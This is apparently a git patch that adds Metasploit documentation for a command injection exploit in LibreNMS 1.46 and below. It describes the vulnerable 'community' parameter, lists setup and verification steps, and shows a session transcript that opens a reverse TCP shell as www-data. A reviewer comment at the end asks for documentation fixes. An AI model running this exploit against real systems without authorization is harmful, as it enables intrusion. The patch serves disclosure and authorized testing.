From bd0109b328511ca21ed263fd7ae6d35e2bea4dee Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 29 May 2019 15:51:53 -0500 Subject: [PATCH] add documentation --- .../linux/http/librenms_cmd_injection.md | 64 +++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/librenms_cmd_injection.md diff --git a/documentation/modules/exploit/linux/http/librenms_cmd_injection.md b/documentation/modules/exploit/linux/http/librenms_cmd_injection.md new file mode 100644 index 0000000000..01ac9be33e --- /dev/null +++ b/documentation/modules/exploit/linux/http/librenms_cmd_injection.md 
@@ -0,0 +1,64 @@ +## Description + + In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`. + The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as + a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`, + and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command + is passed to the `popen()` function, which results in execution of arbitrary code. + + This module has been tested on LibreNMS `v1.46` and `v1.45`. + +## Vulnerable Application + + A vulnerable version of LibreNMS for Ubuntu can be installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/). + In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` + with a vulnerable version of the software, ex: `1.46`. + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/linux/http/librenms_cmd_injection``` + 4. Do: ```set RHOSTS ``` + 5. Do: ```set USERNAME ``` + 6. Do: ```set PASSWORD ``` + 7. Do: ```run``` + 8. You should get a shell. 
+ +## Scenarios + +### Tested on LibreNMS 1.46 on Ubuntu 18.04 + + ``` + msf5 > use exploit/linux/http/librenms_cmd_injection + msf5 exploit(linux/http/librenms_cmd_injection) > set rhosts 192.168.37.143 + rhosts => 192.168.37.143 + msf5 exploit(linux/http/librenms_cmd_injection) > set username blah + username => blah + msf5 exploit(linux/http/librenms_cmd_injection) > set password password + password => password + msf5 exploit(linux/http/librenms_cmd_injection) > set lhost 192.168.37.1 + lhost => 192.168.37.1 + msf5 exploit(linux/http/librenms_cmd_injection) > run + + [*] Started reverse TCP double handler on 192.168.37.1:4444 + [*] Successfully logged into LibreNMS + [+] Successfully added device with hostname dFEzcH + [*] Accepted the first client connection... + [*] Accepted the second client connection... + [+] Successfully deleted device with hostname dFEzcH and id #126 + [*] Command: echo 38eJIFZsiRl3Er48; + [*] Writing to socket A + [*] Writing to socket B + [*] Reading from sockets... + [*] Reading from socket A + [*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n" + [*] Matching... + [*] B is input... + [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500 + + whoami + www-data + uname -a + Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux + ```
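Review bot: the Verification Steps in this hunk omit `set LHOST`, yet the Scenarios transcript below them has to run `set lhost 192.168.37.1` before `run` because the module starts a reverse TCP handler; add a `Do: ```set LHOST ``` ` step between the PASSWORD step and `run` so the steps match what is actually needed to get the shell in step 8. In the same list, steps 4 to 6 read `set RHOSTS `, `set USERNAME ` and `set PASSWORD ` with nothing after the option name; give each a placeholder value (target address, LibreNMS username, LibreNMS password) so a reader knows what to fill in. The Description should also say that this is an authenticated exploit: the transcript shows `Successfully logged into LibreNMS` and `Successfully added device with hostname dFEzcH` before the payload fires, so a valid account that is allowed to add devices is a precondition, and a reader of the Description alone cannot tell that from "an unsanitized parameter retrieved through a POST request to `addhost`". Finally, "results in execution of arbitrary code" overstates the primitive slightly; what `popen()` gives here is execution of arbitrary shell commands as the web server user (`www-data` in the transcript), which is worth stating since it tells the reader what privileges the session has.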